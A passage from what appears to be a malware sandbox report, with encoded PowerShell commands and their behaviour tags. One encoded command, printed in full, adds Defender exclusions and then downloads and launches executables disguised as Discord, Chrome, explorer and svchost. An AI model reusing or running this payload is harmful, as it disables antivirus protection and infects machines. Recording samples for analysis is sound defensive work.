EEARQBFAEEAUwBBAEIAWgBBAEUARQBBAFcAUQBCADMAQQBFAEkAQQBiAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBEAEEAQQBRAFEAQgBEAEEARABRAEEAUQBRAEIAYQBBAEYARQBBAFEAZwBBADAAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAUwBnAEIAMwBBAEUARQBBAFMAdwBCAEIAQQBFAE0AQQBhAHcAQgBCAEEARQBNAEEAWgB3AEIAQgBBAEUAcwBBAFEAUQBCAEYAQQBHAHMAQQBRAFEAQgBpAEEARwBjAEEAUQBnAEEAeQBBAEUARQBBAFIAdwBBADQAQQBFAEUAQQBZAFEAQgAzAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwB3AEEAUQBRAEIASABBAEUAawBBAFEAUQBCAFYAQQBHAGMAQQBRAGcAQgBzAEEARQBFAEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAFIAQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAVABRAEIAQgBBAEcAUQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEYARQBBAFEAZwBCADUAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGEAdwBCAEIAQQBFAGcAQQBWAFEAQgBCAEEARwBNAEEAWgB3AEIAQwBBAEgATQBBAFEAUQBCAEUAQQBFAFUAQQBRAFEAQgBKAEEARQBFAEEAUQBRAEIAMABBAEUARQBBAFIAUQBBADQAQQBFAEUAQQBaAEEAQgBSAEEARQBJAEEATQBBAEIAQgBBAEUAVQBBAFcAUQBCAEIAQQBHAEUAQQBVAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgByAEEARQBFAEEAUgB3AEIAMwBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAUgBRAEIAQgBBAEcAUQBBAFEAUQBCAEMAQQBIAEEAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAaQBBAEcAYwBBAFEAZwBCADYAQQBFAEUAQQBSAGcAQgB6AEEARQBFAEEAVABRAEIAQgBBAEUASQBBAFoAQQBCAEIAQQBFAEUAQQBiAHcAQgBCAEEARgBNAEEAVQBRAEIAQwBBAEgAVQBBAFEAUQBCAEkAQQBGAGsAQQBRAFEAQgBpAEEASABjAEEAUQBnAEIAeQBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBUAEEAQgBSAEEARQBJAEEAVwBBAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBGAGsAQQBaAHcAQgBDAEEARgBNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAGoAQQBGAEUAQQBRAGcAQQB4AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFkAdwBCADMAQQBFAEkAQQBNAEEAQgBCAEEARQBNAEEAUQBRAEIAQgBBAEUAdwBBAFUAUQBCAEMAQQBGAFkAQQBRAFEAQgBJAEEARQBrAEEAUQBRAEIAaABBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQgBSAEEARQBFAEEAWgBBAEIAUgBBAEUASQBBAGUAUQBCAEIAQQBFAGMAQQBkAHcAQgBCAEEARQAwAEEAWgB3AEIAQgBBAEcAYwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBVAEEASABjAEEAUQBnAEEAeABBAEUARQBBAFMAQQBCAFIAQQBFAEUAQQBVAGcAQgBuAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBGAG8AQQBVAFEAQgBCAEEARwBjAEEAUQBRAEIARABBAEYARQBBAFEAUQBCAGkAQQBFAEUAQQBRAGcAQgAyAEEARQBFAEEAUgB3AEIATgBBAEUARQBBAFcAUQBCAFIAQQBFAEkAQQBNAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAGQAdwBCAEMAQQBIAFUAQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIAWABBAEgAYwBBAFEAUQBCADQAQQBFAEUAQQBSAGcAQQB3AEEARQBFAEEAUQB3AEIAbgBBAEUASQBBAFMAZwBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARwBRAEEAWgB3AEIAQwBBAEgAWQBBAFEAUQBCAEgAQQBIAE0AQQBRAFEAQgBhAEEARgBFAEEAUQBRAEIAMABBAEUARQBBAFIAZwBCAGoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAYQBRAEIAQgBBAEUAWQBBAFMAUQBCAEIAQQBGAG8AQQBVAFEAQgBDAEEASABnAEEAUQBRAEIASQBBAEYAVQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA2AEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFMAUQBCAEIAQQBFAEUAQQBkAEEAQgBCAEEARQBZAEEAVgBRAEIAQgBBAEcATQBBAFoAdwBCAEMAQQBIAEEAQQBRAFEAQgBEAEEARQBFAEEAUQBRAEIASwBBAEUARQBBAFEAZwBBAHgAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQBnAEIAQgBBAEUARQBBAGUAZwBCAEIAQQBFAE0AQQBRAFEAQgBCAEEARQB3AEEAVQBRAEIAQwBBAEYAQQBBAFEAUQBCAEkAQQBGAFUAQQBRAFEAQgBrAEEARQBFAEEAUQBnAEIASABBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAFEAUQBCAEIAQQBFAG8AQQBRAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAFoAQQBIAGMAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFkAUQBCAFIAQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEATgBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBHAEkAQQBRAFEAQgBFAEEARQBrAEEAUQBRAEIAWQBBAEYARQBBAFEAUQBCAEwAQQBFAEUAQQBSAFEAQgByAEEARQBFAEEAWQBnAEIAbgBBAEUASQBBAE0AZwBCAEIAQQBFAGMAQQBPAEEAQgBCAEEARwBFAEEAZAB3AEIAQwBBAEcAdwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBXAEEASABjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAEoAQQBFAEUAQQBWAFEAQgBuAEEARQBJAEEAYgBBAEIAQgBBAEUAZwBBAFIAUQBCAEIAQQBHAFEAQQBVAFEAQgBDAEEARwB3AEEAUQBRAEIASQBBAEUAMABBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBuAEEARQBFAEEAUQB3AEEAdwBBAEUARQBBAFYAZwBCAFIAQQBFAEkAQQBlAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEUAawBBAFEAUQBCAEIAQQBHAHMAQQBRAFEAQgBJAEEARgBVAEEAUQBRAEIAagBBAEcAYwBBAFEAZwBCAHoAQQBFAEUAQQBSAEEAQgBSAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGQAQQBCAEIAQQBFAFUAQQBPAEEAQgBCAEEARwBRAEEAVQBRAEIAQwBBAEQAQQBBAFEAUQBCAEYAQQBGAGsAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAegBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAYQB3AEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBHAEkAQQBkAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEUAVQBBAFEAUQBCAGsAQQBFAEUAQQBRAGcAQgB3AEEARQBFAEEAUgB3AEEANABBAEUARQBBAFkAZwBCAG4AQQBFAEkAQQBlAGcAQgBCAEEARQBZAEEAYwB3AEIAQgBBAEUAMABBAGQAdwBCAEMAQQBHAFEAQQBRAFEAQgBCAEEARwA4AEEAUQBRAEIARABBAEcAYwBBAFEAZwBCAHQAQQBFAEUAQQBSAHcAQQA0AEEARQBFAEEAWQB3AEIAbgBBAEUASQBBAGIAQQBCAEIAQQBFAGMAQQBSAFEAQgBCAEEARgBrAEEAZAB3AEIAQwBBAEcAOABBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUQBRAEIAcgBBAEUARQBBAFIAdwBCADMAQQBFAEUAQQBZAGcAQgAzAEEARQBJAEEAYQBnAEIAQgBBAEUAYwBBAFIAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEASABBAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAGkAQQBHAGMAQQBRAFEAQgBuAEEARQBFAEEAUgB3AEIAcgBBAEUARQBBAFkAZwBCAG4AQQBFAEUAQQBaAHcAQgBCAEEARQBNAEEAVQBRAEIAQgBBAEcASQBBAFEAUQBCAEMAQQBIAFkAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAWgBBAEYARQBBAFEAZwBBAHcAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAWQBnAEIAMwBBAEUASQBBAGQAUQBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARQBzAEEAVQBRAEIAQgBBAEcAYwBBAFEAUQBCAEkAQQBIAE0AQQBRAFEAQgBEAEEARwBjAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAWgB3AEIAQgBBAEUAWQBBAFQAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEARwBnAEEAUQBRAEIASQBBAEUAawBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBnAEIAQgBBAEUARQBBAFkAdwBCAG4AQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEAVABRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCADAAQQBFAEUAQQBSAFEAQgBaAEEARQBFAEEAWQBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARgBVAEEAUQBRAEIAQwBBAEcAZwBBAFEAUQBCAEkAQQBGAEUAQQBRAFEAQgBoAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAFIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFQAUQBCAEIAQQBGAGsAQQBVAFEAQgBDAEEARABBAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGkAQQBIAGMAQQBRAGcAQgAxAEEARQBFAEEAUQB3AEIAQgBBAEUARQBBAFQAQQBCAFIAQQBFAEkAQQBXAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAFoAdwBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAFUAQQBFAEUAQQBTAEEAQgBSAEEARQBFAEEAWgBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARQBrAEEAUQBRAEIAQwBBAEUAawBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBhAEEARQBFAEEAUQBnAEIAcgBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBZAGcAQgBuAEEARQBFAEEAWgB3AEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUwBBAEEAdwBBAEUARQBBAEkAZwBBAD0AIgAKAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgBsAEEAQwBBAEEAUwBBAEIAcABBAEcAUQBBAFoAQQBCAGwAQQBHADQAQQBJAEEAQQB0AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFkAUQBCAHUAQQBHAFEAQQBJAEEAQQBpAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFQAUQBCAHcAQQBGAEEAQQBjAGcAQgBsAEEARwBZAEEAWgBRAEIAeQBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAagBBAEcAdwBBAGQAUQBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgBRAEIAegBBAEcAVQBBAGMAZwBCAHoAQQBGAHcAQQBVAEEAQgAxAEEARwBJAEEAYgBBAEIAcABBAEcATQBBAFgAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQgB3AEEARwA4AEEAZAB3AEIAbABBAEgASQBBAGMAdwBCAG8AQQBHAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFEAdwBCAHYAQQBHADAAQQBiAFEAQgBoAEEARwA0AEEAWgBBAEEAZwBBAEMASQBBAFEAUQBCAGsAQQBHAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAUQBCADQAQQBHAE0AQQBiAEEAQgAxAEEASABNAEEAYQBRAEIAdgBBAEcANABBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBjAEEAUQB3AEEANgBBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEARABNAEEATQBnAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgB3AEIAcABBAEcANABBAFoAQQBCAHYAQQBIAGMAQQBjAHcAQgBjAEEARgBNAEEAZQBRAEIAegBBAEYAYwBBAFQAdwBCAFgAQQBEAFkAQQBOAEEAQQBuAEEAQwBJAEEAQwBnAEIAdwBBAEcAOABBAGQAdwBCAGwAQQBIAEkAQQBjAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAFgAQQBHAGsAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAVABBAEgAUQBBAGUAUQBCAHMAQQBHAFUAQQBJAEEAQgBJAEEARwBrAEEAWgBBAEIAawBBAEcAVQBBAGIAZwBBAGcAQQBDADAAQQBRAHcAQgB2AEEARwAwAEEAYgBRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAEkAQQBRAFEAQgBrAEEARwBRAEEATABRAEIATgBBAEgAQQBBAFUAQQBCAHkAQQBHAFUAQQBaAGcAQgBsAEEASABJAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBBAGcAQQBDADAAQQBSAFEAQgA0AEEARwBNAEEAYgBBAEIAMQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQQBLAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AUQBBAGcAQQBEADAAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBrAEEAZABBAEIAbwBBAEgAVQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAUQBRAEIAdABBAEcAbwBBAFkAUQBCAGsAQQBFAEkAQQBZAFEAQgBzAEEARwB3AEEAYwB3AEEAdgBBAEYAUQBBAFIAUQBCAFQAQQBGAFEAQQBMAHcAQgB5AEEARwBFAEEAZAB3AEEAdgBBAEgASQBBAFoAUQBCAG0AQQBIAE0AQQBMAHcAQgBvAEEARwBVAEEAWQBRAEIAawBBAEgATQBBAEwAdwBCAHQAQQBHAEUAQQBhAFEAQgB1AEEAQwA4AEEAUgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEMAZwBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABJAEEASQBBAEEAOQBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFoAdwBCAHAAQQBIAFEAQQBhAEEAQgAxAEEARwBJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBFAEUAQQBiAFEAQgBxAEEARwBFAEEAWgBBAEIAQwBBAEcARQBBAGIAQQBCAHMAQQBIAE0AQQBMAHcAQgBVAEEARQBVAEEAVQB3AEIAVQBBAEMAOABBAGMAZwBCAGgAQQBIAGMAQQBMAHcAQgB5AEEARwBVAEEAWgBnAEIAegBBAEMAOABBAGEAQQBCAGwAQQBHAEUAQQBaAEEAQgB6AEEAQwA4AEEAYgBRAEIAaABBAEcAawBBAGIAZwBBAHYAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAEsAQQBDAFEAQQBkAFEAQgB5AEEARwB3AEEATQB3AEEAZwBBAEQAMABBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAGsAQQBkAEEAQgBvAEEASABVAEEAWQBnAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBRAFEAQgB0AEEARwBvAEEAWQBRAEIAawBBAEUASQBBAFkAUQBCAHMAQQBHAHcAQQBjAHcAQQB2AEEARgBRAEEAUgBRAEIAVABBAEYAUQBBAEwAdwBCAHkAQQBHAEUAQQBkAHcAQQB2AEEASABJAEEAWgBRAEIAbQBBAEgATQBBAEwAdwBCAG8AQQBHAFUAQQBZAFEAQgBrAEEASABNAEEATAB3AEIAdABBAEcARQBBAGEAUQBCAHUAQQBDADgAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAUQBBAGQAUQBCAHkAQQBHAHcAQQBOAEEAQQBnAEEARAAwAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGQAQQBCAG8AQQBIAFUAQQBZAGcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAFEAUQBCAHQAQQBHAG8AQQBZAFEAQgBrAEEARQBJAEEAWQBRAEIAcwBBAEcAdwBBAGMAdwBBAHYAQQBGAFEAQQBSAFEAQgBUAEEARgBRAEEATAB3AEIAeQBBAEcARQBBAGQAdwBBAHYAQQBIAEkAQQBaAFEAQgBtAEEASABNAEEATAB3AEIAbwBBAEcAVQBBAFkAUQBCAGsAQQBIAE0AQQBMAHcAQgB0AEEARwBFAEEAYQBRAEIAdQBBAEMAOABBAGMAdwBCADIAQQBHAE0AQQBhAEEAQgB2AEEASABNAEEAZABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBDAGcAQQBLAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFEAQQBBAG8AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIARQBBAEcAawBBAGMAdwBCAGoAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAHMAQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBEAEEARwBnAEEAYwBnAEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATABBAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBRAEEASABVAEEAWQBnAEIAcwBBAEcAawBBAFkAdwBCAGMAQQBFAFEAQQBiAHcAQgAzAEEARwA0AEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAHoAQQBGAHcAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAcwBBAEEAbwBBAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARgBBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBGAHcAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBIAE0AQQBYAEEAQgB6AEEASABZAEEAWQB3AEIAbwBBAEcAOABBAGMAdwBCADAAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAawBBAEMAZwBBAEsAQQBFAGsAQQBiAGcAQgAyAEEARwA4AEEAYQB3AEIAbABBAEMAMABBAFYAdwBCAGwAQQBHAEkAQQBVAGcAQgBsAEEASABFAEEAZABRAEIAbABBAEgATQBBAGQAQQBBAGcAQQBDADAAQQBWAFEAQgB5AEEARwBrAEEASQBBAEEAawBBAEgAVQBBAGMAZwBCAHMAQQBEAEUAQQBJAEEAQQB0AEEARQA4AEEAZABRAEIAMABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgBzAEEATQBBAEIAZABBAEEAbwBBAFMAUQBCAHUAQQBIAFkAQQBiAHcAQgByAEEARwBVAEEATABRAEIAWABBAEcAVQBBAFkAZwBCAFMAQQBHAFUAQQBjAFEAQgAxAEEARwBVAEEAYwB3AEIAMABBAEMAQQBBAEwAUQBCAFYAQQBIAEkAQQBhAFEAQQBnAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AZwBBAGcAQQBDADAAQQBUAHcAQgAxAEEASABRAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBBAGcAQQBDAFEAQQBiAEEAQgB2AEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBIAE0AQQBXAHcAQQB4AEEARgAwAEEAQwBnAEIASgBBAEcANABBAGQAZwBCAHYAQQBHAHMAQQBaAFEAQQB0AEEARgBjAEEAWgBRAEIAaQBBAEYASQBBAFoAUQBCAHgAQQBIAFUAQQBaAFEAQgB6AEEASABRAEEASQBBAEEAdABBAEYAVQBBAGMAZwBCAHAAQQBDAEEAQQBKAEEAQgAxAEEASABJAEEAYgBBAEEAegBBAEMAQQBBAEwAUQBCAFAAQQBIAFUAQQBkAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEoAQQBCAHMAQQBHADgAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAGIAQQBEAEkAQQBYAFEAQQBLAEEARQBrAEEAYgBnAEIAMgBBAEcAOABBAGEAdwBCAGwAQQBDADAAQQBWAHcAQgBsAEEARwBJAEEAVQBnAEIAbABBAEgARQBBAGQAUQBCAGwAQQBIAE0AQQBkAEEAQQBnAEEAQwAwAEEAVgBRAEIAeQBBAEcAawBBAEkAQQBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABRAEEASQBBAEEAdABBAEUAOABBAGQAUQBCADAAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASQBBAEEAawBBAEcAdwBBAGIAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEIAegBBAEYAcwBBAE0AdwBCAGQAQQBBAG8AQQBDAGcAQgBtAEEARwA4AEEAYwBnAEIAbABBAEcARQBBAFkAdwBCAG8AQQBDAEEAQQBLAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBrAEEAYgBnAEEAZwBBAEMAUQBBAGIAQQBCAHYAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAEsAUQBBAGcAQQBIAHMAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEYATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQB0AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHoAQQBIAE0AQQBJAEEAQQB0AEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBRAEEAYgBBAEIAdgBB